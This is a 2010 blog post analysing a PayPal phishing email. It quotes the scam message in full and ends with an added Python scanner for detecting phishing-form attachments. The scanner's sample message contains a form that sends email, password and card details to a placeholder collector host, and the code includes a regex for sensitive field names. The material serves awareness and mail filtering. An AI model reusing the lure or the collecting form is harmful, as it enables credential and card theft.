Saturday, May 1, 2010

Paypal Phishing Scam Reborn in a New Shape - - Recipient's Paypal Account Error: Reality and Analysis of The Mail

Beware! It's a Cyber World - - Summary:

An email declaring itself to be a "new message" from PayPal claims that an error has been detected in the recipient's PayPal account and that he or she must submit an attached form verifying his or her details or risk having the account suspended.

Wake up guys! The email is not from Paypal. The claim that there is a problem with the recipient's account is a lie designed to trick him or her into submitting Paypal account details to Internet criminals. Any information entered on the bogus form can be collected by criminals and used to hijack the user's Paypal and credit card accounts.

In November 2009, the same type of phishing scam was reported here on "Beware! It's a Cyber World" under the title:

Paypal Primary Email Address Change Phishing Scam

Cyber criminals have now returned with the next episode in the form of the current phishing scam. Before moving on to the detailed analysis, let's have a look at the mail contents:


Subject: You have a new message from PayPal !

Dear PayPal Customer,

During our regularly scheduled account maintenance and verification procedure we have detected a slight error in your PayPal online account.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)

2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please fill in all the details that are required to complete this verification process.

To do this we have attached a form to this email. Please download the form and follow the instructions on your screen. NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the "Help" link in the footer of any page.


Beware! It's a Cyber World - - Explanation:

This email, which claims to be from popular online payment service PayPal, informs the recipient that an error has been found in his or her PayPal account and the account must therefore be verified to avoid suspension. The message instructs the recipient to fill in and submit a form attached to the email. The form asks for the user's PayPal email address and password along with credit card details and personal identity information.

However, the message is a phishing scam and certainly is not from PayPal. The claim that there is a problem with the recipient's PayPal account is a lie designed to fool him or her into complying with the fraudulent instructions and submitting personal and financial information. All of the information submitted on the bogus form can be collected by the criminals operating the scam and subsequently used for fraud and identity theft.

Because of its high profile and because it conducts the majority of its business and transactions online, PayPal has become a favourite target of phishing scammers. Criminals constantly use and reuse a great many variations of the above scam in order to trick victims into relinquishing their sensitive personal information. While this version includes the bogus form as an attached file, others may entice the recipient into clicking a link and visiting a fraudulent website designed to resemble the genuine PayPal site. The scammers often use tricks such as address spoofing and disguised links to make their messages seem more legitimate. They may also use PayPal logos and other graphics stolen from the genuine PayPal website to further the illusion that their messages are genuine.

PayPal will never send you an unsolicited email asking you to submit account login details, bank or credit card details or other personal information such as your full name and driver's license numbers. Thus, if you receive an email that asks you to submit such details, then you should treat it with the utmost caution. If you receive such an email, do not open any attachments that may come with the email. Do not click any links in the email. PayPal has published information warning its customers about such phishing scams.

In the past it has been more common for phishing scammers to use direct links to bogus "look-a-like" websites that try to trick victims into submitting information. However, in an increasingly common ploy, the scammers now often include the fraudulent web form as an HTML email attachment. Clicking the attachment opens the bogus form in the user's web browser. The form is coded to ensure that all information entered into the form will be automatically sent to the scammers when the "Submit" button is pressed. Scammers are apparently making more use of email attachments in an attempt to get around the increasingly sophisticated anti-phishing filters now being used by modern web browsers and computer security software.
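For mail filtering, the attached-form trick described above can be checked before a user ever opens the file. The following is an added example, not part of the original post: the names `FormScanner` and `scan_message`, the field-name hints, the trusted-domain list and the placeholder collector host are all assumptions made for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = re.compile(r"pass|card|cvv|expir|ssn", re.I)  # assumed name hints

class FormScanner(HTMLParser):
    """Records each <form>'s action and the sensitive inputs inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            name = a.get("name") or ""
            if (a.get("type") or "").lower() == "password" or SENSITIVE.search(name):
                self._open["fields"].append(name)
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def scan_message(raw, trusted=("paypal.com",)):
    """Yield (filename, action, fields) for attached HTML forms worth blocking."""
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html" or not part.get_filename():
            continue  # only HTML parts delivered as named attachments
        scanner = FormScanner()
        scanner.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for form in scanner.forms:
            host = (urlparse(form["action"]).hostname or "").lower()  # "" if relative
            if form["fields"] and not any(host == d or host.endswith("." + d) for d in trusted):
                yield (part.get_filename(), form["action"], form["fields"])

# Constructed sample: a message with an HTML attachment; the host is a placeholder.
SAMPLE = """\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="form.html"

<form method="post" action="http://collector.example.invalid/save.php">
<input name="email"><input type="password" name="pw"><input name="card_number"></form>
--b1--
"""
```

Calling `list(scan_message(SAMPLE))` reports the attachment name, the form's destination and the sensitive fields it collects. A form that submits through script rather than an `action` attribute is outside what this check covers.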
